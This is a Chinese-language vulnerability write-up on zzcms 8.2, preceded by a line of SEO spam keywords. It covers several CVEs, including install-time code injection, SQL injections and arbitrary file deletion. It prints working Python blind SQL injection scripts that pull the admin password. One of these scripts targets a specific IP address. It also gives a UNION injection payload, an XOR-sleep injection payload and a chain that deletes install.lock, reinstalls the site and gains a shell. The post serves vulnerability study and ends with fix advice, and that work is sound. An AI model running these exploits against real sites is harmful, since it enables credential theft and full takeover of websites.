学做php网站有哪些,东莞手机端建站模板,公园网站建设,代做论文网站看了一下最近的cve列表#xff0c;发现有大佬怒刷了好多个cve#xff0c;这个zzcms都快被审穿了#xff0c;所以跟进学习一下CMS背景本文跟踪的这个cms#xff0c;属于一个开源招商网站管理系统#xff0c;属于比较小的cms#xff0c;所以很多地方写的不是很完善#xf…看了一下最近的cve列表发现有大佬怒刷了好多个cve这个zzcms都快被审穿了所以跟进学习一下CMS背景本文跟踪的这个cms属于一个开源招商网站管理系统属于比较小的cms所以很多地方写的不是很完善导致了漏洞的产生项目官网为 http://www.zzcms.net/ 本次我跟进的版本为8.2。CVE-2018-8966首先这是一个在安装的时候的代码注入如果不配合其他漏洞删除安装后产生的锁文件 install.lock 这个漏洞在实际环境中将毫无作用。下面我们来具体分析一下漏洞产生的原因系统在安装的过程中对输入的变量并没有任何过滤就写入了文件所以我们只要闭合有关代码然后注入命令就可以拿到shell。下面开始复现复现成功同理这里既然能插入 php 代码那也可以插入一端 javascript 代码造成存储型xss具体流程不在分析。CVE-2018-8967这是一个前台的sql注入可以获取管理员密码的账号密码问题出在了 /user/adv2.php 下面我们分析一下代码这里整个cms还是对传入的cms进行了过滤的过滤代码在/inc/stopsqlin.php,但是在这个地方是没有对sql变量用引号包裹所以不用单引号也可以直接进行sql注入。但是这个地方想要注入前面需要满足一定的条件见下图至少要让这两个数据出来的值有一个是1否则将不会进入注入的代码。这里的坑点比较多简单讲下吧有一个知识点select * from zzcms_ad where id 1 or sleep(4);按照常理这个会延时但是如果表中是空的那这个将不会有任何延时所以我们在注入的时候要保证表中有数据才能正常延时盲注的所以这里要利用这个盲注需要满足的条件有注册为企业用户并且通过审核发布广告报账zzcms_main中有一条记录整个网站的广告表zzcms_add中需要至少有一条数据当上面的条件都满足的时候就可以进行注入了下面贴一下paylaodimport requestsimport strings requests.session()url http://127.0.0.1:8000/user/adv2.php?actionmodifycookies {UserName:test1,#换成你注册的企业用户的用户名}flag for i in range(1,40):for j in range(33,125):data {id:0 or if((select ascii(substr(pass,{},1)) from zzcms_admin){},sleep(3),0).format(i,j)}try:r s.post(url,datadata,cookiescookies,timeout1)except:flag chr(j)print flagbreakprint flag实际测试截图CVE-2018-8965这是一个任意文件删除漏洞危害还是很大的配合上面的安装过程中的getshell还是可以有很大的攻击面 出问题的代码在:/user/ppsave.php可以发现并没有什么验证只是判断了一下是不是和之前的或者默认的一样然后只要文件存在就使用了 unlink 删除了文件.所以这个漏洞分析和利用都很简单 我们删除了安装的锁文件 /install/install.lock然后就可以重新安装zzcms从而配合上文分析的漏洞获取shell。CVE-2018-9309又是一枚sql注入漏洞不过这个也是一个需要登陆需要设置相关信息才能利用的漏洞。属于设计不当。首先我们看一下出问题的核心代码if (!empty($_POST[sql])){//从模板中获取SQL内容,为发送对像$_SESSION[sql]stripfxg($_POST[sql]);}$sql$_SESSION[sql];$sql2$sql. order by id asc limit $n,$size;$rsquery($sql2);$rownum_rows($rs);可以发现这里将post参数中的sql进行了解码放进了session中而 stripfxg 函数代码如下function stripfxg($string,$htmlspecialchars_decodefalse,$nl2brfalse) {//去反斜杠$stringstripslashes($string);//去反斜杠,不开get_magic_quotes_gpc 的情况下在stopsqlin中都加上了这里要去了if ($htmlspecialchars_decodetrue){$stringhtmlspecialchars_decode($string);//转 html 实体符号}if ($nl2brtrue){$stringnl2br($string);}return $string;}可以发现并不是什么过滤所以这里直接拼接进入sql中是及其危险的后面还有一些没有申请cve的漏洞也是因为调用了这个函数导致了过滤失效。代码利用也是比较简单的127.0.0.1/dl/dl_sendmail.phppost数据为sqlselect email from zzcms_dl where id-1 union select group_concat(table_name) from information_schema.columns where table_schemadatabase()#下面是执行结果CVE-2018-9331有一枚任意文件删除漏洞不得不说这个系统在这个的判断上真的是很有问题 这次产生问题的文件在/user/adv.php也是一个 oldimg 和 img 对比产生的问题和上面分析类似都是只判断了是否和原来的相同然后拼接了 ../ 就直接调用 unlink 所以利用也很简单只需要将html中表单属性的hidden删掉然后直接输入想要删除的文件名就可以啦没有申请cve的漏洞有几个sql注入比较严重下面逐个分析一下No.1 getip()未过滤出问题的代码在 /user/check.php 中在检查用户登录的位置发现会调用 getip() 这个函数我们跟进看一下发现并没有过滤可以直接注入xff头来进行注入注入脚本如下import requestsimport strings requests.session()url http://219.219.61.234:8000/user/adv.php//只要include了check.php都可以cookies {UserName:test1,PassWord:21232f297a57a5a743894a0e4a801fc3}flag for i in range(1,40):print ifor j in range(33,125):head {X-Forwarded-For:1 where username test1 and if((select ascii(substr(pass,{},1)) from zzcms_admin){},sleep(10),0)#.format(i,j)}try:r s.post(url,headershead,cookiescookies,timeout9)except:flag chr(j)print flagbreakprint flag测试截图为No.2 del.php未过滤第二个注入产生的根源还是过滤的不够严格全局的注入过滤在没有引号的地方可以随意注入出问题的代码在/user/del.php不过这个注入有一个前提我们需要先发布一个咨询信息然后管理员审核过以后就可以利用来注入了这个在实际场景中还是可以实现的。可以看到直接将tablename拼接进入了sql语句中所以利用起来难度也不是很大但是这里并没有回显所以需要使用时间盲注或者dns log外带的方法来获取数据。No.3 stripfxg过滤不完整在整个系统中还有个函数是非常危险的他可以将全局过滤还原成正常的数据如果这个数据带入了sql查询中是可以直接造成注入的。代码逻辑所以这里的利用也是比较简单的POST /user/msg.php?actionsavedatasaveasadd参数为info_content123 ^ sleep(5))#id1Submit2%E4%BF%AE%E6%94%B9%0D%0A这里有一个注入的小技巧就是在做insert注入和update注入的时候除了能够多伪造一组数据以外还可以使用这种异或符号加上sleep函数来延时注入insert into user (content)VALUES(1 ^ if(11,sleep(5),0)#验证截图总结系统存在的问题系统在实现逻辑的过程中存在了太多了没有过滤直接带入逻辑的情况这在很多大的框架中是不存在的建议可以自己封装一层在封装层中间实现好过滤用起来也很方便系统对用户文件的存储删除有很大问题很多在删除用户文件的时候并没有检查是不是合法就直接unlink了这可以导致很大的问题。系统在很多地方很轻易的就将自己的过滤去掉了核心就是那个stripfxg函数建议减少这个函数的使用保证所有变量都经过了过滤。
